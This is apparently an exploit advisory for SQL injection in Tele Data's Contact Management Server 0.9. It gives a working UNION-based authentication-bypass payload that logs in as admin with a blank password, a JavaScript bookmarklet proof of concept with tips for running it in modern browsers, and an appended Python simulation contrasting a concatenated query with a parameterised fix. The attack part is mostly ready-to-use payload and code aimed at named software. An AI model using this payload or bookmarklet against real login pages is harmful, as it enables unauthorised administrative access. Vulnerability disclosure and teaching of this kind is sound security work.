|=================================================================================================|
| ___ ___ ___ ___ ___ ___ | | /\ \ /\ \ /\__\ ___ /\ \ /\ \ /\ \ | | /::\ \ /::\ \ /::| | /\ \ /::\ \ /::\ \ /::\ \ | | /:/\:\ \ /:/\:\ \ /:|:| | \:\ \ /:/\:\ \ /:/\:\ \ /:/\:\ \ | | /:/ \:\ \ /:/ \:\ \ /:/|:| |__ /::\__\ /::\~\:\ \ /::\~\:\ \ /::\~\:\ \ | | /:/__/ \:\__\ /:/__/ \:\__\ /:/ |:| /\__\ __/:/\/__/ /:/\:\ \:\__\ /:/\:\ \:\__\ /:/\:\ \:\__\ | | \:\ \ \/__/ \:\ \ /:/ / \/__|:|/:/ / /\/:/ / \/__\:\ \/__/ \:\~\:\ \/__/ \/_|::\/:/ / | | \:\ \ \:\ /:/ / |:/:/ / \::/__/ \:\__\ \:\ \:\__\ |:|::/ / | | \:\ \ \:\/:/ / |::/ / \:\__\ \/__/ \:\ \/__/ |:|\/__/ | | \:\__\ \::/ / /:/ / \/__/ \:\__\ |:| | | | \/__/ \/__/ \/__/ \/__/ \|__| | |
|=================================================================================================|
|                                                                                                 |
| Vulnerability............SQL Injection                                                          |
| Software.................Tele Data's Contact Management Server 0.9                              |
| Download.................http://teledata.qc.ca/td_cms/TD_CMS_SETUPEX.exe                        |
| Date.....................4/28/10                                                                |
|                                                                                                 |
|=================================================================================================|
|                                                                                                 |
| Site.....................http://cross-site-scripting.blogspot.com/                              |
| Email....................john.leitch5@gmail.com                                                 |
|                                                                                                 |
|=================================================================================================|
|
| ##Description##
|
| There isn't much in the way of security here. It's possible to log in with admin privileges by
| injecting SQL into the username field. As there are client-side length constraints in place for
| the username field, I packaged the exploit in some JavaScript for ease of use.
|
|
| ##Exploit##
|
| ' or 1=0 UNION SELECT 1 as RecID,0,'' AS Password,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 FROM Users;--
|
| The opening quote closes the username literal and 1=0 empties the original result set; the UNION
| then appends a forged row whose Password column is empty, so the password check succeeds with a
| blank password. The constant list has to be exactly as wide as the Users table or the UNION will
| not compile, and ;-- ends the statement and comments out whatever the application appends after
| the username.
|
| ##Proof of Concept##
|
| javascript:document.forms[0][0].setAttribute("value","' or 1=0 UNION SELECT 1 as RecID,0,'' AS Password,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 FROM Users;--");document.forms[0].submit();
|
| Run this on the login page: it writes the payload straight into the value attribute of the first
| control of the first form (the username field), which the field's client-side length limit does
| not apply to, then submits the form. Current browsers strip or block javascript: URLs pasted into
| the address bar, so paste the part after javascript: into the developer console instead. A
| maxlength or similar client-side constraint is not a security control: anything that submits the
| request directly, this bookmarklet or an intercepting proxy, bypasses it.
|=================================================================================================|
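To see why the payload works, here is an added simulation that is not code from Tele Data's product (whose back end and schema are not shown in this advisory): a login routine that builds its lookup by string concatenation is run against an in-memory SQLite table with the payload above, and then the same check is repeated with a bound parameter. Everything about the schema is an assumption except what the payload itself implies (RecID first, Password third): the UserName and Level column names, the filler columns that make the table as wide as the UNION SELECT list, the sample account 'alice', and the reading of the constant 2 as the admin level.

```python
import sqlite3

# The payload exactly as given in the advisory above.
PAYLOAD = ("' or 1=0 UNION SELECT 1 as RecID,0,'' AS Password,2,"
           "0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 FROM Users;--")


def payload_column_count(payload):
    """Count the columns in the payload's UNION SELECT list.

    A UNION only compiles when both sides return the same number of
    columns, so the forged row must be exactly as wide as Users.
    """
    select_list = payload.split("SELECT", 1)[1].rsplit(" FROM", 1)[0]
    return select_list.count(",") + 1


def build_db():
    """In-memory stand-in for the product's Users table (assumed schema).

    RecID and Password come from the payload's aliases; UserName, Level
    and the filler columns are assumptions made so the table is as wide
    as the payload expects. 'alice' is a constructed sample account.
    """
    con = sqlite3.connect(":memory:")
    con.row_factory = sqlite3.Row
    cols = ["RecID INTEGER", "UserName TEXT", "Password TEXT", "Level INTEGER"]
    cols += [f"Extra{i} INTEGER DEFAULT 0"
             for i in range(payload_column_count(PAYLOAD) - len(cols))]
    con.execute(f"CREATE TABLE Users ({', '.join(cols)})")
    con.execute("INSERT INTO Users (RecID, UserName, Password, Level) "
                "VALUES (1, 'alice', 's3cret', 1)")
    con.commit()
    return con


def login_vulnerable(con, username, password):
    """Lookup built by string concatenation: the username becomes SQL.

    With the payload, 1=0 empties the real result set and the UNION
    supplies a forged row whose Password is '', so a blank password
    matches. Returns the Level of the matched row, or None on failure.
    """
    sql = f"SELECT * FROM Users WHERE UserName = '{username}'"
    row = con.execute(sql).fetchone()
    if row is not None and row["Password"] == password:
        return row["Level"]
    return None


def login_fixed(con, username, password):
    """Same check with a bound parameter: the username is data, not SQL."""
    row = con.execute("SELECT * FROM Users WHERE UserName = ?",
                      (username,)).fetchone()
    if row is not None and row["Password"] == password:
        return row["Level"]
    return None


if __name__ == "__main__":
    con = build_db()
    # Level 2 is assumed here to be the admin level the advisory refers to.
    print("vulnerable, payload + blank password ->", login_vulnerable(con, PAYLOAD, ""))
    print("fixed, payload + blank password      ->", login_fixed(con, PAYLOAD, ""))
    print("fixed, real credentials              ->", login_fixed(con, "alice", "s3cret"))
```

The table width is derived from the payload rather than hard-coded, which is the same constraint an attacker has to satisfy in the real application: guess the column count wrong and the UNION fails before any row is forged. The fix is parameterisation alone; the password comparison is left as-is because the advisory says nothing about how the product stores passwords.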